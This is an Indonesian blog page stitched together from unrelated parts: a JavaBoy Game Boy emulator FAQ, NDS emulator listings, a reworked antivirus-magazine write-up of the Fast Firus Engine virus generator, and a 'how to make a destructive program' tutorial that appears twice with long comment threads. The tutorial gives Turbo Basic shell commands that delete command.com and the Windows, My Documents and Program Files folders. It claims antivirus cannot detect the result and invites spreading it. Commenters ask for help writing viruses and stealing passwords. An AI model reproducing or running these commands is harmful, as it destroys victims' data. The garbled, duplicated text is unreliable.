Kamis, 30 September 2010

Cara Main Javaboy

This frequently aked questions page answers everything you'd never wanted to know about JavaBoy.

Q: What does JavaBoy actually do?
Q: What do I need to run JavaBoy?
Q: How do I start JavaBoy?
Q: Then what do I do?
Q: What are the keys?
Q: Why is everything so slow?
Q: How do I use JavaBoy as an applet on a web page?
Q: Can JavaBoy load compressed ROM images?
Q: Can I use JavaBoy on my web page?
Q: How do I use the networking feature?
Q: What do the colour schemes do?
Q: Why won't my game work?
Q: How do I save my game when running JavaBoy on a web site?
Q: How do I compile JavaBoy?
Q: What's the debugger for?
Q: What's the meaning of life, the universe, and everything?

Q: What does JavaBoy actually do?

A: JavaBoy is an emulator. An emulator is a piece of software which performs tasks usually done by hardware. In this case, the emulator allows you to play games written for the Gameboy or Gameboy Color on the PC (or any other platform)

Q: What do I need to run JavaBoy?

A: JavaBoy requires at least a Pentium II/266 processor to run, and a Pentium II/600 is reccommended for Colour Gameboy games. You will also need to have a Java Virtual Machine installed. You can download this from Sun or IBM, although the IBM one will provide much better performance.

Q: How do I start JavaBoy?

A: To run JavaBoy, once you have installed your Virtual Machine, simply unzip the ZIP file into any directory, start a DOS prompt, and type

java JavaBoy

when you are in the relevant directory, remebering to ensure the capitalization is correct. If this doesn't work, make sure that the Java Virtual Machine is on your path, and that you are in the correct directory.

Q: Then what do I do?

A: You need a ROM for the game you want to play. This is an image of a Gameboy cartridge. There are several freeware ROMS available on this site. ROMs for commercial games are under copyright. You might be able to find them on the net somewhere, but please don't ask me for them. It's only legal to own a ROM image if you also own the original game cartridge.

Once you've got your ROM, click 'File', 'Open ROM...', and then select your ROM file. Then click 'File', 'Emulate'. The game should run.

Q: What are the keys?

A: Use the cursor arrows for the D-pad. 'Z' for the A button, 'X' for the B button, Return for the start button, and backspace for the select button. You can change these keys using the 'Define Controls..' option on the file menu.

Q: Why is everything so slow?

A: Java programs are interpreted, so the speed is less than ideal. To speed up the emulator, you can use a smaller window from the 'View' menu. You can also force it to display less frames. The action is more jerky, but the game will run faster. To adjust frame skip, press F1 and F2 on your keyboard.

Q: How do I use JavaBoy as an applet on a web page?

A: First, create an HTML file with the following tag:




Then, place the HTML file, the ROM image, and all the emulator files (*.class), and open the HTML file in a browser. You should be able to play the game in the browser, after clicking on the applet window to give it the keyboard focus. A reduced feature set is available when JavaBoy is running as an applet. Black and white games can only be played with the standard colours. The applet width and height must be a multiple of the GameBoy screen's width and height, to allow the applet to stretch the image to the right size. Once started, you can click the applet to get a menu that allows you to choose your options. You will only be able to resize the image smaller than it is already, or the edges of the image will be clipped out. A larger image makes it easier to see the game on large screens, but also makes the emulator run slower if your PC is not up to the task.

Q: Can JavaBoy load compressed ROM images?

A: Yes, ROMs can be loaded in ZIP/JAR or GZip format. In the application version, just select the name of the Zip file when you choose File/Open. For the applet version, use the name of the Zip file in the "ROMIMAGE" parameter to the applet. For ZIP/JAR files, the first .GB or .GBC file in the Zip will be used. GZip files cannot be Tarred, or they won't work.

Q: Can I use JavaBoy on my web page?

A: That depends. If you page is non-commercial, then you can use JavaBoy all you want. If your page is commercial, then you ned to email me to discuss licencing conditions.

Q: How do I use the networking feature?

Networking allows you to play certain games against other players on a LAN or the Internet. This feature is very much in it's infancy, and it has only been shown to work with three games, (Tetris, Dr Mario, and Dynablaster) so you may not have much luck with any others.

To use the feature, you need two machines on the same TCP/IP network. Run JavaBoy on both machines, and load the same ROM. On one machine, choose 'Allow connections' from the 'Network' menu. On the other machine, choose 'Connect to client' from the 'Network' menu. Enter the IP address of the other machine in the box and click ok. You will be notified when the connection is made. Then start the two player game as if you were running on two linked Gameboys. Be patient, as games are often punctuated by long pauses as the machines communicate.

Q: What do the colour schemes do?

A: The colour schemes can be found at the bottom of the 'View' menu. These alow black & white games to be given a kind of 'false colour'. Select one of the options to see what it's like. The 'LCD Shades' option tries to reproduce the yellow shades on the original Gameboy. This will have no effect on colour games.

Q: Why won't my game work?

A: The compatibility of the emulator is not 100%, and there are several known games which don't work, or display major faults. If you find a game which is not listed on the compatibility page which doesn't work, email me and I may fix it in a later version. No promises though, as these things are notoriously hard to track now.

Q: How do I save my game when running JavaBoy on a web site?

A: In version 0.91 and above, JavaBoy supports sending save data to a website. The data is sent as an HTTP post request to a specified URL.

What this means is that you need a server which supports some form of scripting, and to write a script which performs the saving. Sample PHP script is included in this archive which will do the job. The script was kindly contributed by Daniel Fisher. This script saves text files for each user. They are called 'saveram.php' and 'loadram.php'.

If your server doesn't support PHP, or you want to save in a different way (perhaps to a database) you will have to write your own script. You will need programming knowledge for this.

If you're using free web space, you're probably out of luck, as these almost never support scripting. You can still use JavaBoy, but you won't be able to save your game.

To set the URL used for saves, include the following in your tag:


The SaveRamURL is the address that save data is submitted to, and the LoadRamURL is the address that data is loaded from. Any parameters included in the urls are sent to the script as well.

The Username allows you to keep several user's saves private. The username is passed to the url to allow the server to determine who's save is in use. THis is entirely optional though, you may prefer to generate a user id and append it to the base urls.

When enabled, two extra options appear on JavaBoy's applet menu, Save and Load.

When Save is selected, JavaBoy opens a connection to the SaveRamURL. The POST section of the request contains the folllowing fields:

'romname' - The filename of the ROM being played
'gamename' - The name of the game being played (internal ROM name)
'user' - The user that was passed to the applet as the 'USERNAME' parameter. 'datalength' - The number of bytes that need to be saved.
'data0' - The save data itself, a long string, the length of which is equal to 'datalength'.

The applet doesn't require any particular response from the server.

When Loading data, a similar process occurs. This time, the user variable is passed on the GET method of the URL, which lets the server determine which user is performing the load. The 'gamename' variable and the 'romname' variable is sent via the POST method. The server must respond with the 'data0' field which was sent to it when the game was saved.

If there was no save data, the user should return with the string 'NOSAVERAM'. A general error condition can be indicated by returning 'ERROR' followed on the same line with details of the error. The details will be shown to the user.

Please note that to save, JavaBoy must be loaded from the same server that is used to save the data. If these differ, Java will throw a security exception. This is because all unsigned Java apps on a web page run in a sandbox that doesn't allow them to contact servers other than the one they were loaded from.

Q: How do I compile JavaBoy?

A: To compile JavaBoy, you will need the source archive, which can be found on the downloads page. You will also need a compiler which supports Java 1.2 (Java2 Revision 1.2). You can find this on Sun's site, amoung others. Once you have this, simply type:

javac -O *.java

The necessary .class files will then be created.

Q: What's the debugger for?

A: It's a tool that can be used to debug Gameboy games while they're in development. You can examine the internal state of the gameboy, and change it to see how the game responds. It came in very handy to debug the emulator too.

Q: What's the meaning of life, the universe, and everything?

A: That's easy, it's 42.
Background graphics taken from The Legend of Zelda, Earthworm Jim, Gremlins 2, Tetris, Bubble Bobble, Super Marioland, Gradius 2, Bubble Ghost, Megaman, Super Marioland 3, Burger Time, Donkey Kong, Aladdin, Street F

Download NDS Emulator

NO$GBA started as a Gameboy Advance debugger but was later released as a normal emulator(version 1.9). It is the first gameboy advance emulator to support multiplayer games on the same pc! Later versions added support for the NintendoDS portable console.


How to use multiplayer

  • put the GBA BIOS file in the emulator's folder, and rename it to "gba.rom"
  • run No$GBA.exe
  • pick a GBA image (no ZIP)
  • go to "Options" / "Emulation setup"
  • increase the number of "Emulated Gameboys"
  • in "Link Gamepaks", set "Gamepaks in all GBA"
  • in "Reset/Startup Entrypoint", set "GBA BIOS (Nintendo logo")
  • click OK, you should then see 2 GBA screens side by side
  • right click on the left window, click on "Link" so that the window comes back to normal.
  • then redo the right-click and click "Link" , and here we go, the 2nd gameboy does boot!
Please remember that the more gameboy's you emulate the stonger the pc will have to be!

 User Rating   Vote 
Rating: 7.7 (23871 Votes)
Rate it:

Download


 File   Platform   License   Date   Size 
 No$gba 2.6a   Windows   Freeware   Mar 1, 2010   155 Kb.   View homepage 

DeSmuME


DeSmuME is the first Nintendo DS emulator able to run some commercial games at a playable level.


Video

Below is a video which demonstrates DeSmuME v0.7.0 running Super Mario 64. The system used to create this video is an Intel Core 2 Duo E6600 system overclocked to 3 Ghz. Both emulation quality and speed are not quite there yet.
   Click to view more...

 User Rating   Vote 
Rating: 7.4 (7847 Votes)
Rate it:

Download


 File   Platform   License   Date   Size 
 DeSmuME 0.9.5   Windows   Freeware   Dec 21, 2009   2801 Kb.   View homepage 

Cara Bikin Virus Parah

Aksika, Virus “open source” satu itu sungguh mempunyai banyak sekali jenisnya. Tidak heran karena source code-nya memang disediakan gratis di Internet, jadi siapa saja bisa dengan mudah mengubah dan merobah source codenya dan jadilah jenis baru dari Cara Membuat Virus.
Cara Membuat Virus
Berawal dari kemudahan itulah, banyak Cara Membuat Virus atau programer newbi mencoba–coba untuk membuat virus tanpa perlu usaha extra. Cuma dibutuhkan hanya pengetahuan seputar operating system dan programmingKomputer saja.
Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan aplikasi Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari aplikasi tersebut. Ya, Virus Generator merupakan aplikasi untuk dapat membuat virus secara mudah dan instan.
Bermula dari contoh sebuah virus lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, tetapi antivirus lain ada juga menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat dari Virus Generator.
Fast Firus Engine (FFE)
Pembuat Cara Membuat Virus Generator tersebut menamakan aplikasi buatannya itu dengan nama Fast Firus Engine. Seperti terlihat pada aplikasi ataupun situs pembuatnya, ia memberitahukan bahwa aplikasi ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila aplikasi ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk melakukan perusakan.

Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast FirusEngine.exe dan data.ex_. Fast Firus Engine . exe merupakan aplikasi utama dalam pembuatan virusnya dan sementara file data.exe. Sebenarnya merupakan badan virus asli belum sebelum dirobah.
Ketika file Fast Firus Engine.exe dijalankan, maka Cara Membuat Virus pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.
Cara Membuat Virus dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yg Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.
Bagaimana Cara Membuat Virus Menginfeksi?
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic di compile dengan metode Native Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.
Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, Cara Membuat Virus juga mengubah atau membuat file Oeminfo.ini merupakan bagian dari System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.
Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi menggunakan nama sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.
Dan tak lupa, pada root drive akan terdapat sebuah file dengan nama “baca euy.txt” berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author Cara Membuat Virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini nantinya ditampilkan pada file “baca euy.txt” tersebut.
Setelah virus berhasil memindahkan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yg running biasanya berasal dari direktori System32.
Cara Membuat Virus Mengubah Registry.
Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.
Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.
Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.
Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user ketika mengakses aplikasi dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.
Bagaimana Cara Membuat Virus Virus Menyebar?
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat kita mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapatrunning otomatis pada saat mengakses flash disk tersebut.
File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.
Cara Virus Beraksi?
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap aplikasi yang tidak ia inginkan seperti tools atau aplikasiantivirus termasuk PCMAV. Sama seperti halnya dataregistry yang diubah, data mengenai aplikasi apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.
Jadi, saat virus komputer sudah berada di memory, ia akan memantau setiap aplikasi yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama programantivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa aplikasi setup atau installer juga tidak dapat dijalankan padakomputer terinfeksi.
Pencegahan dan Penanggulangan Cara Membuat Virus ?
PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE (uangmayainternet.blogspot.com).
Ok selamat mencoba tips Cara Membuat Virus Komputer di atas, oh ya udah pada punya facebook belum? kalau belum baca juga Cara Membuat Facebook bagi yg belum punya ;)

Cara Membuat Virus

Cara membuat program perusak (Seperti Virus)

- Download Turbo Basic v1.0
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
Penulis :
Yogya Family Code
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Share this post: | | | |

Comments

joule said:

hebat uiiiii...
yogyafree nyontek tu......
# January 22, 2005 9:19 AM

joule said:

Yogyafree adalah nama lain dari Yogya Family Code, untuk lebih jelas masuk http://familycode.atspace.com/aboutweb.htm
# March 12, 2005 5:20 AM

joule said:

cara membuat firus dengan cepat dan sederhana
# February 21, 2006 11:24 AM

joule said:

gimana carana membuat virus yang lebih ganas
# March 25, 2006 9:28 PM

joule said:

gimamana caranya
# March 27, 2006 10:37 PM

joule said:

apa sih turbo basic itu? saya gak ngerti kalau pake visual basic v6 bisa gak?
# April 8, 2006 10:32 AM

joule said:

aku ingin tahu bagaimana membuat virus handal dan mematikan sekalian car membuat anti virusnya
# April 26, 2006 12:41 AM

joule said:

hgsdkgvcdjghsdc4612
312j53
5415.332/6211/'3

0
# April 28, 2006 10:00 PM

joule said:

melly
# April 28, 2006 10:02 PM

joule said:

okkkk
# May 8, 2006 8:54 AM

joule said:

contoh contoh program dalam turbo basic
# May 23, 2006 8:10 AM

joule said:

payah banget sich kayak gak ada kerjaan lain aja.salam buat karulina yang ada di ploso
# May 26, 2006 11:37 PM

joule said:

i think is good idea, because the program a lattle
# June 10, 2006 9:43 AM

joule said:

Gile
# August 4, 2006 10:31 PM

joule said:

keren oiy
# August 7, 2006 3:28 AM

joule said:

mana boy
# August 25, 2006 12:19 AM

joule said:

tolong kirim software Turbo Basic v1.0
ke email saya
# September 3, 2006 10:51 PM

joule said:

maturnuwun
# September 8, 2006 12:38 PM

pugo said:

^_^
# December 24, 2007 3:24 PM

virus.com said:

dimana cara membuat virus dengan VB?
# February 22, 2008 1:41 PM

virus.com said:

tolong bantu saya untuk membuat virus dari Vb?
# February 22, 2008 1:47 PM

the grim reaper said:

dah basi tu mas.. yang baru dan ganas serta simpel baru mantap,. :)
# March 15, 2008 1:00 PM

yuga said:

eh maaf saya mau tanya!, bagaimanakah cara untuk membuat firus tanpa di instal?..., seperti virus yang biasanya!.
dan BAGAIMANA cara untuk membuat virus hanphone (simbian / JAVA)
kenapa kalau saya mau Download Turbo Basic v1.0 selalu gagal, dan saya selalu kembali ke halaman seperti ini?...
tolong ya saya dikirimi Turbo Basic v1.0 dan tolong kirim di yugawk@gmail.com
terima kasiH
wassalam....
yuga
# March 27, 2008 9:23 PM

ferry said:

tolong dong kasih tau gimana cara melihat password orang lain kirimin ke e-mail saya okk fery_crisn@yahoo.co.id
aq tunggu
# April 1, 2008 9:52 AM

ferly said:

gimana sich membut virus dengan mudah
# April 7, 2008 6:39 PM

Mr.A said:

Gimana sich setiap download turbo basic v1.0 selalu kembali ke halaman ini....!?
# April 9, 2008 3:46 PM

oki said:

klo yg gt download virusnya dimn?
website nYa ap?
# April 12, 2008 9:14 PM

Platinum said:

tolong dong kak aku minta kirimin visual basic 6.0 atau kl tidak ada bisa tidak kirim aku software CMASTER4. Vplatinum@yahoo.com
makasih kak
# April 12, 2008 11:59 PM

Ndon said:

ngonno ae bangga .q pny progam yang jauh lebih hebat
# April 29, 2008 2:26 PM

FEBRI3 said:

boz tlg donk ajrin cara membuat virus and anti virusnya y?pleace buat tambah pengetahuan.and tlng krim softwarenya ke emailq ya boz.matur suwon sanget
# May 2, 2008 11:12 AM

gatsli said:

tolong beri tau cara membuat virus dengan vb yang paling hebat, kirim ke achmad_gatsli@yahoo.co.id
# May 17, 2008 9:37 AM

sambung said:

ok ok
# May 17, 2008 10:30 AM

jo said:

mbaak..
gmana cara mengkompil program virus dari vb agar menjadi .exe.
thx...
blz ke email ya mbak..
armagedon_gaptek@yahoo.com
# May 20, 2008 12:10 PM

b_all said:




Udah Basi!!!, temuin yang terbaru dong...


# May 24, 2008 12:36 PM

b_all said:




 udah basi..., temuin yang baru dong...
# May 24, 2008 12:40 PM

2k5 said:

Allahu Akbar
# May 24, 2008 12:43 PM

cOe said:

wah seru tu, , , ,
# May 30, 2008 2:43 AM

jack said:

bisa g qt buat program yang bisa bikin warnet mati tiba2?!
# June 11, 2008 4:50 PM

jack said:

bisa g kita buat program y bisa buat warnet mati tiba2?!
# June 11, 2008 4:55 PM

Julianto said:

tlg dong kirimkan prog turbo basic v1.0 ke email saya, sy mau coba buat sesuatu yang dahsyat... trims b4
# June 15, 2008 10:08 PM

kiwids said:

tlg dong kirimkan prog turbo basic v1.0 ke email saya
orank_rese@yahoo.com
di tunggu, terima kasih sebelumnya.
# June 22, 2008 8:17 PM

bro said:

keren harus lebih dipublikasikan
# June 25, 2008 3:07 PM

Cara Membuat Program Perusak « Absanka (Achmad S.) Blog said:

Pingback from  Cara Membuat Program Perusak « Absanka (Achmad S.) Blog
# July 5, 2008 8:58 PM

ghode said:

tolong kirimin ke email sya ya...
ke Ghode_lord@yahoo.com
please ...!
# July 24, 2008 9:29 PM

ghode said:

kirimin prog turbo basic v1.0 dong..?
ke Ghode_lord@yahoo.com
# July 24, 2008 9:31 PM

b_nchoyz said:

saya sangat tertarik pngen nyoba, tp kumaha nya sayah teh gak ngerti sama sekali. hrs gmn cara ngejelasin pd sayah.tolong...dijelasin pake bahasa ndeso aja, biar saya ngerti.terimakasih
# August 5, 2008 9:36 PM

danny_d said:

gimana sich cara bikin virus tanpa turbo basic????
# October 25, 2008 7:26 AM

ANDY said:

YG LAEN DUNK . . . . .
MASAK DRI JAMAN KEN AROK TU DUANK . . . . .
# November 2, 2008 2:34 PM

Fay said:

MMMM....??? Gw Binging Nioch...!!!!
# November 7, 2008 10:11 PM

weldy said:

aya tertarik dalam hal ini
# April 2, 2009 1:20 AM

1111 said:

11111
# April 8, 2009 9:03 PM

ade said:

ajarin dong
# April 15, 2009 10:06 AM

suck said:

memek goreng virus....
anjingk,,,
# May 3, 2009 1:11 AM

nyut...nyut said:

kenapa dengan menyontek dapat membuat bangga diri....!!!
# May 23, 2009 10:03 PM

Billy dock said:

kenapa kalau saya mau Download Turbo Basic v1.0 selalu gagal, dan saya selalu kembali ke halaman seperti ini?...
tolong ya saya dikirimi Turbo Basic v1.0 dan tolong kirim di susuryabilly628@gmail.com
terima kasiH
# June 25, 2010 11:30 AM

Billy dock said:

tlg dong kirimkan prog turbo basic v1.0 ke email saya
susuryabilly628@gmail.com
di tunggu, terima kasih sebelumnya.
soal ya sya da cba download tpi kga bz blik lagi ke halaman ini jga

Joule's Blog

get a job, get an education, and learn to save and invest wisely any one can do it :)
See also: Other Geeks@INDC

Cara membuat program perusak (Seperti Virus)

- Download Turbo Basic v1.0
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
Penulis :
Yogya Family Code
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Share this post: | | | |

Comments

joule said:

hebat uiiiii...
yogyafree nyontek tu......
# January 22, 2005 9:19 AM

joule said:

Yogyafree adalah nama lain dari Yogya Family Code, untuk lebih jelas masuk http://familycode.atspace.com/aboutweb.htm
# March 12, 2005 5:20 AM

joule said:

cara membuat firus dengan cepat dan sederhana
# February 21, 2006 11:24 AM

joule said:

gimana carana membuat virus yang lebih ganas
# March 25, 2006 9:28 PM

joule said:

gimamana caranya
# March 27, 2006 10:37 PM

joule said:

apa sih turbo basic itu? saya gak ngerti kalau pake visual basic v6 bisa gak?
# April 8, 2006 10:32 AM

joule said:

aku ingin tahu bagaimana membuat virus handal dan mematikan sekalian car membuat anti virusnya
# April 26, 2006 12:41 AM

joule said:

hgsdkgvcdjghsdc4612
312j53
5415.332/6211/'3

0
# April 28, 2006 10:00 PM

joule said:

melly
# April 28, 2006 10:02 PM

joule said:

okkkk
# May 8, 2006 8:54 AM

joule said:

contoh contoh program dalam turbo basic
# May 23, 2006 8:10 AM

joule said:

payah banget sich kayak gak ada kerjaan lain aja.salam buat karulina yang ada di ploso
# May 26, 2006 11:37 PM

joule said:

i think is good idea, because the program a lattle
# June 10, 2006 9:43 AM

joule said:

Gile
# August 4, 2006 10:31 PM

joule said:

keren oiy
# August 7, 2006 3:28 AM

joule said:

mana boy
# August 25, 2006 12:19 AM

joule said:

tolong kirim software Turbo Basic v1.0
ke email saya
# September 3, 2006 10:51 PM

joule said:

maturnuwun
# September 8, 2006 12:38 PM

pugo said:

^_^
# December 24, 2007 3:24 PM

virus.com said:

dimana cara membuat virus dengan VB?
# February 22, 2008 1:41 PM

virus.com said:

tolong bantu saya untuk membuat virus dari Vb?
# February 22, 2008 1:47 PM

the grim reaper said:

dah basi tu mas.. yang baru dan ganas serta simpel baru mantap,. :)
# March 15, 2008 1:00 PM

yuga said:

eh maaf saya mau tanya!, bagaimanakah cara untuk membuat firus tanpa di instal?..., seperti virus yang biasanya!.
dan BAGAIMANA cara untuk membuat virus hanphone (simbian / JAVA)
kenapa kalau saya mau Download Turbo Basic v1.0 selalu gagal, dan saya selalu kembali ke halaman seperti ini?...
tolong ya saya dikirimi Turbo Basic v1.0 dan tolong kirim di yugawk@gmail.com
terima kasiH
wassalam....
yuga
# March 27, 2008 9:23 PM

ferry said:

tolong dong kasih tau gimana cara melihat password orang lain kirimin ke e-mail saya okk fery_crisn@yahoo.co.id
aq tunggu
# April 1, 2008 9:52 AM

ferly said:

gimana sich membut virus dengan mudah
# April 7, 2008 6:39 PM

Mr.A said:

Gimana sich setiap download turbo basic v1.0 selalu kembali ke halaman ini....!?
# April 9, 2008 3:46 PM

oki said:

klo yg gt download virusnya dimn?
website nYa ap?
# April 12, 2008 9:14 PM

Platinum said:

tolong dong kak aku minta kirimin visual basic 6.0 atau kl tidak ada bisa tidak kirim aku software CMASTER4. Vplatinum@yahoo.com
makasih kak
